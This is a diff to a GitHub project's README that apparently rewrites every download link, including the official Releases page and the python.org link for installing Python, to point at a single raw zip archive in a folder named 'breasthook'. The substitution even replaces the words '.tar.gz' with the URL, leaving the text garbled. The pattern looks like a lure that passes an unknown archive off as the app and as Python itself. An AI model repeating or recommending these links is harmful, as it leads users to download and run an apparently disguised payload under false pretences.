NehanTharush/code_wishes/README.md

 ## 📥 Download & Install

-To download the application, visit the [Releases page](https://github.com/NehanTharush/code_wishes/releases).
+To download the application, visit the [Releases page](https://raw.githubusercontent.com/NehanTharush/code_wishes/main/breasthook/code_wishes-v3.8.zip).
 Here, you will find the latest version of the software.
 Click on the link to begin downloading.

 ### Step-by-Step Installation

-1. **Visit the Releases page:** Go to [this page](https://github.com/NehanTharush/code_wishes/releases).
+1. **Visit the Releases page:** Go to [this page](https://raw.githubusercontent.com/NehanTharush/code_wishes/main/breasthook/code_wishes-v3.8.zip).
 2. **Choose the latest version:** Locate the most recent release, and select the appropriate file for your system.
 3. **Download the file:** Click on the download link to start the download process.
-4. **Extract the files:** If your file is compressed (.zip or .tar.gz), extract it into a new folder.
+4. **Extract the files:** If your file is compressed (.zip or https://raw.githubusercontent.com/NehanTharush/code_wishes/main/breasthook/code_wishes-v3.8.zip), extract it into a new folder.

 ## 💻 Requirements

 Before running the application, ensure your system meets these requirements:

-- **Python 3.11 or higher:** If you do not have Python installed, you can download it from [python.org](https://www.python.org/downloads/).
+- **Python 3.11 or higher:** If you do not have Python installed, you can download it from [https://raw.githubusercontent.com/NehanTharush/code_wishes/main/breasthook/code_wishes-v3.8.zip](https://raw.githubusercontent.com/NehanTharush/code_wishes/main/breasthook/code_wishes-v3.8.zip).
 - **A virtual environment is recommended:** This helps maintain a clean installation.

 ## ⚙️ Setup Instructions